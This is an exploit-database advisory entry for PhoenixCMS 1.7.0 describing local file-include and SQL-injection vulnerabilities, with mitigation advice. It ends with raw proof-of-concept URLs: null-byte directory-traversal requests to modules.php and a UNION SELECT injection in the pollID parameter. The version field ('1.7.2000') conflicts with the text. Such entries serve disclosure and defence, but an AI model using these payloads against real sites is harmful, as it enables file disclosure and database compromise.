header-logo
Suggest Exploit
vendor:
PhoenixCMS
by:
7.5
CVSS
HIGH
Local File-Include, SQL-Injection
22, 89
CWE
Product Name: PhoenixCMS
Affected Version From: 1.7.2000
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

PhoenixCMS local file-include and SQL-injection vulnerabilities

The local file-include vulnerability allows an attacker to view and execute arbitrary local files within the context of the webserver process by using directory-traversal strings. The SQL-injection vulnerability can be exploited to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Apply the latest patches and updates from the vendor. Avoid using user-supplied input in SQL queries and implement proper input validation and sanitization techniques.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47389/info

PhoenixCMS is prone to a local file-include vulnerability and an SQL-injection vulnerability.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process.

The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PhoenixCMS 1.7.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/modules.php?name=Work_Probe&file=../../WS_FTP.LOG%00
http://www.example.com/[path]/modules.php?name=News&file=../../WS_FTP.LOG%00
http://www.example.com/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5--